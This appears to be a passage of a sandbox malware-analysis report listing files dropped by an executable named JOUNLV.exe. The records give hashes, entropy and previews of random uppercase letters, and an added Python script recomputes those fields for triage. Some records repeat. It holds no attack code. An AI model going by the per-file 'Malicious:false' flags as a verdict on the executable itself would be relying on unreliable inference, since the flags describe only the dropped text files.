                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
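The records above give, for each file JOUNLV.exe dropped, its size, 8-bit entropy, MD5/SHA1/SHA-256/SHA-512 digests and a libmagic-style description ("ASCII text, with very long lines (1024), with CRLF line terminators"). The Python below is an added example, not part of the Joe Sandbox report and not code from the analysed sample, that reproduces those fields for a local copy of a dropped file so the report can be cross-checked, and flags the pattern visible here: uppercase-only ASCII whose entropy lands just under log2(26) ≈ 4.70 bits/byte, the ceiling for text drawn uniformly from 26 letters. That ceiling is what separates random-letter filler (4.69-4.70, as reported) from an encrypted or compressed blob, which sits near 8.0. The 1026-byte input is constructed to match the reported shape (1024 random letters plus CRLF); the function names, dictionary keys and thresholds are the example's own, not the sandbox's.

```python
"""Reproduce the per-file fields of a dropped-file record (size, 8-bit entropy,
hashes, text/line-terminator heuristics) for offline cross-checking.
Added example; constructed input, not a real dropped file."""
import hashlib
import math
import random
import string
from collections import Counter

# Maximum entropy of text drawn from 26 equiprobable symbols (A-Z): ~4.7004 bits/byte.
LETTER_CEILING = math.log2(26)


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the same scale as the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def describe_text(data: bytes) -> dict:
    """Heuristics mirroring 'ASCII text, with very long lines (N), with CRLF line terminators'."""
    is_ascii = all(b < 0x80 for b in data)
    crlf = b"\r\n" in data
    lines = data.split(b"\r\n" if crlf else b"\n")
    longest = max((len(line) for line in lines), default=0)
    body = data.replace(b"\r\n", b"").replace(b"\n", b"")
    alphabet = set(body)
    uppercase_only = bool(body) and alphabet <= set(string.ascii_uppercase.encode())
    return {"ascii": is_ascii, "crlf": crlf, "longest_line": longest,
            "distinct_symbols": len(alphabet), "uppercase_only": uppercase_only}


def triage(data: bytes) -> dict:
    """Return the report-style fields plus two interpretation flags (example's own names)."""
    ent = shannon_entropy(data)
    info = describe_text(data)
    info.update({
        "size": len(data),
        "entropy": ent,
        # Upper-case hex, as the report prints digests.
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
        # A-Z-only text cannot exceed log2(26); a value just under it means the letters are
        # close to uniformly distributed, i.e. random filler rather than a ciphertext/compressed
        # blob, which would approach 8.0. The 0.05 margin is an arbitrary triage threshold.
        "near_letter_ceiling": info["uppercase_only"] and ent > LETTER_CEILING - 0.05,
        "high_entropy_blob": ent > 7.5,
    })
    return info


def constructed_sample(seed: int = 1) -> bytes:
    """Constructed stand-in for one dropped file: 1024 random uppercase letters + CRLF = 1026 bytes."""
    rng = random.Random(seed)
    return "".join(rng.choice(string.ascii_uppercase) for _ in range(1024)).encode() + b"\r\n"


if __name__ == "__main__":
    # Against a real dropped file: triage(open(path, "rb").read())
    for key, value in triage(constructed_sample()).items():
        print(f"{key}: {value}")
```

To verify a record, run `triage()` over the file recovered from the sandbox and compare the upper-case digests and the entropy with the lines above; a mismatch on the digests means the wrong file or a modified copy, while an entropy well above 4.8 on an A-Z file is impossible and would point at a mis-typed description.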
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.6994061563025005
Encrypted:false
SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:false
Preview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
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.688505748329201
Encrypted:false
SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
MD5:E791BC4BB488A2AE526214AB2CCF03F0
SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
Malicious:false
Preview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
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.690895772725941
Encrypted:false
SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
MD5:A002E80B55673139253599B753BDC01A
SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
Malicious:false
Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.694982189683734
Encrypted:false
SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:E49F84B05A175C231342E6B705A24A44
SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:false
Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.690394987545919
Encrypted:false
SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:CA901F8E74EB7955CF06A00BD424C0C2
SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:false
Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.69782189124949
Encrypted:false
SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
MD5:0640503E533EFB11CC70F43D2FFF4E26
SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
Malicious:false
Preview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
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.688284131239007
Encrypted:false
SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:E8ACCA0F46CBA97FE289855535184C72
SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:false
Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                                                          MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                                                          SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                                                          SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                                                          SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
